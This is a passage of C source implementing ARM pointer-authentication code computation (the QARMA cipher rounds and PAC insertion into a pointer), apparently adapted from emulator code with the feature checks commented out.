uint64_t o = 0;
int b;
for (b = 0; b < 64; b += 4) {
o |= (uint64_t)sub1[(i >> b) & 0xf] << b;
}
return o;
}
static uint64_t pac_inv_sub(uint64_t i)
{
static const uint8_t inv_sub[16] = {
0x5, 0xe, 0xd, 0x8, 0xa, 0xb, 0x1, 0x9,
0x2, 0x6, 0xf, 0x0, 0x4, 0xc, 0x7, 0x3,
};
uint64_t o = 0;
int b;
for (b = 0; b < 64; b += 4) {
o |= (uint64_t)inv_sub[(i >> b) & 0xf] << b;
}
return o;
}
static int rot_cell(int cell, int n)
{
/* 4-bit rotate left by n. */
cell |= cell << 4;
return extract32(cell, 4 - n, 4);
}
static uint64_t pac_mult(uint64_t i)
{
uint64_t o = 0;
int b;
for (b = 0; b < 4 * 4; b += 4) {
int i0, i4, i8, ic, t0, t1, t2, t3;
i0 = extract64(i, b, 4);
i4 = extract64(i, b + 4 * 4, 4);
i8 = extract64(i, b + 8 * 4, 4);
ic = extract64(i, b + 12 * 4, 4);
t0 = rot_cell(i8, 1) ^ rot_cell(i4, 2) ^ rot_cell(i0, 1);
t1 = rot_cell(ic, 1) ^ rot_cell(i4, 1) ^ rot_cell(i0, 2);
t2 = rot_cell(ic, 2) ^ rot_cell(i8, 1) ^ rot_cell(i0, 1);
t3 = rot_cell(ic, 1) ^ rot_cell(i8, 2) ^ rot_cell(i4, 1);
o |= (uint64_t)t3 << b;
o |= (uint64_t)t2 << (b + 4 * 4);
o |= (uint64_t)t1 << (b + 8 * 4);
o |= (uint64_t)t0 << (b + 12 * 4);
}
return o;
}
static uint64_t tweak_cell_rot(uint64_t cell)
{
return (cell >> 1) | (((cell ^ (cell >> 1)) & 1) << 3);
}
static uint64_t tweak_shuffle(uint64_t i)
{
uint64_t o = 0;
o |= extract64(i, 16, 4) << 0;
o |= extract64(i, 20, 4) << 4;
o |= tweak_cell_rot(extract64(i, 24, 4)) << 8;
o |= extract64(i, 28, 4) << 12;
o |= tweak_cell_rot(extract64(i, 44, 4)) << 16;
o |= extract64(i, 8, 4) << 20;
o |= extract64(i, 12, 4) << 24;
o |= tweak_cell_rot(extract64(i, 32, 4)) << 28;
o |= extract64(i, 48, 4) << 32;
o |= extract64(i, 52, 4) << 36;
o |= extract64(i, 56, 4) << 40;
o |= tweak_cell_rot(extract64(i, 60, 4)) << 44;
o |= tweak_cell_rot(extract64(i, 0, 4)) << 48;
o |= extract64(i, 4, 4) << 52;
o |= tweak_cell_rot(extract64(i, 40, 4)) << 56;
o |= tweak_cell_rot(extract64(i, 36, 4)) << 60;
return o;
}
static uint64_t tweak_cell_inv_rot(uint64_t cell)
{
return ((cell << 1) & 0xf) | ((cell & 1) ^ (cell >> 3));
}
static uint64_t tweak_inv_shuffle(uint64_t i)
{
uint64_t o = 0;
o |= tweak_cell_inv_rot(extract64(i, 48, 4));
o |= extract64(i, 52, 4) << 4;
o |= extract64(i, 20, 4) << 8;
o |= extract64(i, 24, 4) << 12;
o |= extract64(i, 0, 4) << 16;
o |= extract64(i, 4, 4) << 20;
o |= tweak_cell_inv_rot(extract64(i, 8, 4)) << 24;
o |= extract64(i, 12, 4) << 28;
o |= tweak_cell_inv_rot(extract64(i, 28, 4)) << 32;
o |= tweak_cell_inv_rot(extract64(i, 60, 4)) << 36;
o |= tweak_cell_inv_rot(extract64(i, 56, 4)) << 40;
o |= tweak_cell_inv_rot(extract64(i, 16, 4)) << 44;
o |= extract64(i, 32, 4) << 48;
o |= extract64(i, 36, 4) << 52;
o |= extract64(i, 40, 4) << 56;
o |= tweak_cell_inv_rot(extract64(i, 44, 4)) << 60;
return o;
}
static uint64_t pauth_computepac_architected(uint64_t data, uint64_t modifier,
ARMPACKey key, bool isqarma3)
{
static const uint64_t RC[5] = {
0x0000000000000000ull,
0x13198A2E03707344ull,
0xA4093822299F31D0ull,
0x082EFA98EC4E6C89ull,
0x452821E638D01377ull,
};
const uint64_t alpha = 0xC0AC29B7C97C50DDull;
int iterations = isqarma3 ? 2 : 4;
/*
* Note that in the ARM pseudocode, key0 contains bits <127:64>
* and key1 contains bits <63:0> of the 128-bit key.
*/
uint64_t key0 = key.hi, key1 = key.lo;
uint64_t workingval, runningmod, roundkey, modk0;
int i;
modk0 = (key0 << 63) | ((key0 >> 1) ^ (key0 >> 63));
runningmod = modifier;
workingval = data ^ key0;
for (i = 0; i <= iterations; ++i) {
roundkey = key1 ^ runningmod;
workingval ^= roundkey;
workingval ^= RC[i];
if (i > 0) {
workingval = pac_cell_shuffle(workingval);
workingval = pac_mult(workingval);
}
if (isqarma3) {
workingval = pac_sub1(workingval);
} else {
workingval = pac_sub(workingval);
}
runningmod = tweak_shuffle(runningmod);
}
roundkey = modk0 ^ runningmod;
workingval ^= roundkey;
workingval = pac_cell_shuffle(workingval);
workingval = pac_mult(workingval);
if (isqarma3) {
workingval = pac_sub1(workingval);
} else {
workingval = pac_sub(workingval);
}
workingval = pac_cell_shuffle(workingval);
workingval = pac_mult(workingval);
workingval ^= key1;
workingval = pac_cell_inv_shuffle(workingval);
if (isqarma3) {
workingval = pac_sub1(workingval);
} else {
workingval = pac_inv_sub(workingval);
}
workingval = pac_mult(workingval);
workingval = pac_cell_inv_shuffle(workingval);
workingval ^= key0;
workingval ^= runningmod;
for (i = 0; i <= iterations; ++i) {
if (isqarma3) {
workingval = pac_sub1(workingval);
} else {
workingval = pac_inv_sub(workingval);
}
if (i < iterations) {
workingval = pac_mult(workingval);
workingval = pac_cell_inv_shuffle(workingval);
}
runningmod = tweak_inv_shuffle(runningmod);
roundkey = key1 ^ runningmod;
workingval ^= RC[iterations - i];
workingval ^= roundkey;
workingval ^= alpha;
}
workingval ^= modk0;
return workingval;
}
static inline int64_t sextract64(uint64_t value, int start, int length)
{
assert(start >= 0 && length > 0 && length <= 64 - start);
/* Note that this implementation relies on right shift of signed
* integers being an arithmetic shift.
*/
return ((int64_t)(value << (64 - length - start))) >> (64 - length);
}
/*
static uint64_t pauth_computepac_impdef(uint64_t data, uint64_t modifier,
ARMPACKey key)
{
return qemu_xxhash64_4(data, modifier, key.lo, key.hi);
}
*/
static uint64_t pauth_computepac(CPUARMState *env, uint64_t data,
uint64_t modifier, ARMPACKey key)
{
// if (cpu_isar_feature(aa64_pauth_qarma5, env_archcpu(env))) {
return pauth_computepac_architected(data, modifier, key, false);
// } else if (cpu_isar_feature(aa64_pauth_qarma3, env_archcpu(env))) {
// return pauth_computepac_architected(data, modifier, key, true);
// } else {
// return pauth_computepac_impdef(data, modifier, key);
// }
}
static inline uint64_t deposit64(uint64_t value, int start, int length,
uint64_t fieldval)
{
uint64_t mask;
assert(start >= 0 && length > 0 && length <= 64 - start);
mask = (~0ULL >> (64 - length)) << start;
return (value & ~mask) | ((fieldval << start) & mask);
}
static uint64_t pauth_addpac(CPUARMState *env, uint64_t ptr, uint64_t modifier,
ARMPACKey *key, bool data)
{
uint64_t pac, ext_ptr, ext, test;
int bot_bit, top_bit;
ext = sextract64(ptr, 63, 1);
top_bit = 64 ;
bot_bit = 64 - 16;
ext_ptr = deposit64(ptr, bot_bit, top_bit - bot_bit, ext);
pac = pauth_computepac(env, ext_ptr, modifier, *key);
test = sextract64(ptr, bot_bit, top_bit - bot_bit);
if (test != 0 && test != -1) {
pac ^= MAKE_64BIT_MASK(top_bit - 2, 1);
}
pac ^= ptr;
ptr &= MAKE_64BIT_MASK(0, bot_bit);
pac &= ~(MAKE_64BIT_MASK(55, 1) | MAKE_64BIT_MASK(0, bot_bit));
ext &= MAKE_64BIT_MASK(55, 1);
return pac | ext | ptr;
}